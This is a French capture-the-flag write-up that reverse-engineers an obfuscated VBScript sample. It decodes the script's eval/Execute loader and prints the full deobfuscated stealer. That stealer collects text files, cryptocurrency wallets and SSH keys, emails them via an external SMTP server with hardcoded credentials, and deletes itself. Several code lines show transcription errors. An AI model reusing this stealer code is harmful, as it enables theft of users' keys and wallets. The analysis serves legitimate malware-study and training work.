VBScape (EASY)

Auteur(s):

Hokanosekai

Catégorie :

Reverse

Description:

Un étudiant a trouvé un fichier VBS sur un ordinateur de l'université. Il pense qu'il s'agit d'un virus, mais il n'arrive pas à le déchiffrer. Pouvez-vous l'aider ?

⚠ : Le fichier joint contient un vrai malware, ne l'exécutez pas sur votre machine ! Mot de passe de l'archive : ce-ctf-est-trop-cool

Le flag correspond à l'email utilisé pour l'exfiltration et au nom du dernier fichier exfiltré, par exemple UHOCTF{attattacker@evil.com|passwords.txt}

VBScape.zip

Flag : UHOCTF{email|file}

Solution:

On peut donc commencer par dézipper l'archive via la commande 7z en spécifiant le mot de passe.

```
hoka@hoka ~/c/U/VBScape> 7z e VBScape.zip -p"ce-ctf-est-trop-cool"

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz (806EC),ASM,AES-NI)

Scanning the drive for archives: 1 file, 20962 bytes (21 KiB)

Extracting archive: VBScape.zip WARNING: VBScape.zip Can not open the file as [zip] archive The file is open as [7z] archive

---
Path = VBScape.zip
Open WARNING: Can not open the file as [zip] archive
Type = 7z
```

```
Physical Size = 20962
Headers Size = 210
Method = LZMA2:24k 7zAES
Solid = -
Blocks = 1

Everything is 0k

Archives with Warnings: 1
Size: 20734
Compressed: 20962
hoka@hoka ~/c/U/VBScape> ls
.rwxrwxrwx 20k hoka hoka 24 May 11:26 □
aze87ef9ddsd0zkaj521kfdf0dkf0df7sdfd6fsdf6
.rwxrwxrwx 20k hoka hoka 25 May 1:20 □ VBScape.zip
```

On obtient donc un fichier aze87ef9ddsd0zkaj521kfdf0dkf0df7sdfd6fsdf6, grâce à la commande file on peut voir qu'il s'agit encore d'une archive 7zip.

```
hoka@hoka \sim/c/U/VBScape> file aze87ef9ddsd0zkaj521kfdf0dkf0df7sdfd6fsdf6 aze87ef9ddsd0zkaj521kfdf0dkf0df7sdfd6fsdf6: 7-zip archive data, version 0.4
```

On peut donc l'extraire de la même manière que précédemment.

```
hoka@hoka ~/c/U/VBScape> 7z e aze87ef9ddsd0zkaj521kfdf0dkf0df7sdfd6fsdf6
```

On obtient deux fichiers, un fichier image.png.vbs et un fichier description.txt.

Le fichier description.txt contient une répétition de la phrase sorry server is no longer available.

Le fichier image.png.vbs contient du code VBS obfusqué, effectivement les noms de variables et de fonctions sont des caractères aléatoires.

Le mot DIM est utilisé pour déclarer une variable, et le mot SUB est utilisé pour déclarer une fonction.

```
dIM jJkmPKZNvhSgPGmVLdvBVgOimreRTqiaEDiOcfNqy,
AxEjAhgOVVhnXPrQQdPpAItXlqhuIRHOuDWWhvoyp,
FwwcltIiESLKzggUCrjiaEUtjbmpvvGzwJNhoLFSp

Sub FncTqZirWltYCeayCzqdIRdKqrIzaKWRIZbSCprXS
SUb LXTvAQufKFkHMxJwGYFOsFUwJcYBTRDPuPUdadnmD
```

On peut donc voir 2 fonctions et 3 variables.

La variable jJkmPKZNvhSgPGmVLdvBVg0imreRTqiaEDi0cfNqy est utilisée pour stocker une chaîne de caractères. La chaîne en question est un ensemble de nombres et d'opérateurs mathématiques.

Ensuite la variable axEjAhg0VVhnXPrQQdPpAItXlqhuIRH0uDWWhvoyp stocke un split de la chaîne précédente, avec comme séparateur d'une évaluation du calcule eVaL("67484-67437").

On peut très facilement retrouver le caractère servant de séparateur en utilisant la commande suivante :

```
hoka@hoka ~/c/U/VBScape> python3 -c "print(chr(eval('67484 - 67437')))"
/
```

On peut donc voir que le séparateur est le caractère /. Nous pouvons donc déduire que la chaîne de caractères est composée de plusieurs calculs.

Dans la suite du code on voit une boucle for each qui itère sur le split de la chaîne de caractères.

```
for each MqNbrDAQjYRIwUnepBXn0smlQlLuaaeTTwAchSFjz In
AxEjahGovVHNxprqQdPPAITXLqhuiRHOuDwwhV0yP
FWwCltIiEsLkZgGUCRjiAEuTJbMpVVgZwJNh0LFSp =
fwWCLtIieslkZgGUcrjIaEUTJBmPvvgZwjNHoLfSp &
Chr(eVaL(MqnBrdaqjYRIwUnEPBxnoSMlqLluAaeTtwAchSFJz))
NEXT
```

On peut donc voir que la variable FwwcltIiESLKzggUCrjiaEUtjbmpvvGzwJNhoLFSp est utilisée pour stocker la concaténation de la variable FwwcltIiESLKzggUCrjiaEUtjbmpvvGzwJNhoLFSp et du caractère correspondant à l'évaluation du calcul.

Puis la seconde fonction est appelée.

```
SUb LXTvAQufKFkHMxJwGYFOsFUwJcYBTRDPuPUdadnmD
eval(eXecUTe(fwwCltiieslkzggUCrJIaeUtjBmPvvGZwJNHoLFsp))
enD sUB
```

Cette méthode permet d'exécuter le contenu de la variable

FwwcltIiESLKzggUCrjiaEUtjbmpvvGzwJNhoLFSp. Le résultat de la boucle for each est donc exécuté.

Nous pouvons donc déobfusquer le code en remplaçant l'appel de la fonction execute par un affichage de la variable FwwcltIiESLKzggUCrjiaEUtjbmpvvGzwJNhoLFSp.

```
Wscript.Echo FwwcltIiESLKzggUCrjiaEUtjbmpvvGzwJNhoLFSp
```

```
on error resume next
Const Desktop = 4
Const MyDocuments = 16
Set S = CreateObject("Wscript.Shell")
Set FSO = CreateObject("scripting.filesystemobject")
WScript.Sleep(1000 * 30)
strSMTP_Server = "smtp.mail.ru"
strTo = "shadowbyte1337@mail.ru"
strFrom = "shadowbyte1337@mail.ru"
strSubject = "AIRDROP"
strBody = "LOG"
Set iMsg=CreateObject("CDO.Message")
Set iConf=CreateObject("CDO.Configuration")
Set wshShell = CreateObject( "WScript.Shell" )
strUserName = wshShell.ExpandEnvironmentStrings( "%USERNAME%" )
Set Flds=iConf.Fields
Flds.ltem("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru"
Flds.ltem("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 465
Flds.ltem("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
Flds.ltem("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
Flds.ltem("http://schemas.microsoft.com/cdo/configuration/smtpusessl")
Flds.ltem("http://schemas.microsoft.com/cdo/configuration/sendusername") = "shadowbyte1337@mail.ru"
Flds.ltem("http://schemas.microsoft.com/cdo/ci_figuration/sendpassword") = "R4CMZ3rVnMFtzz6vzRi1"
Flds.Update
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.TextBody=strBody
Set fld = FSO.GetFolder(S.SpecialFolders(Desktop))
For each file in fld.files
  if LCase(FSO.GetExtensionName(file)) = "txt" Then
    iMsg.AddAttachment file.path
  End if
Next
Flds.Update
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.TextBody=strBody
Set fld = FSO.GetFolder(S.SpecialFolders(MyDocuments))
For each file in fld.files
  if LCase(FSO.GetExtensionName(file)) = "txt" Then
    iMsg.AddAttachment file.path
  Fnd if
Next
iMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Roaming\Bitcoin\wallet.dat"
iMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Roaming\Litecoin\wallet.dat"
iMsg.AddAttachment \ "C:\Users\ "\& strUserName \& "\.ssh\id\_rsa" \\ iMsg.AddAttachment \ "C:\Users\ "\& strUserName \& "\AppData\Roaming\Electrum\wallets\default\_wallet"
iMsg.AddAttachment "C:\Users\" & strUserName & "\.ssh\id_rsa.pub"
iMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Roaming\DashCore\wallet.dat"
iMsg.AddAttachment "C:\Users\" & strUserName & "\.ssh\known_hosts"
iMsa.Send
Set mFSO = CreateObject("Scripting.FileSystemObject")
Call mFSO.DeleteFile(WScript.ScriptFullName, True)
```

OK

On peut donc maintenant voir l'email et le dernier fichier exfiltré.

Flag : UHOCTF{shadowbyte1337@mail.ru|known_hosts}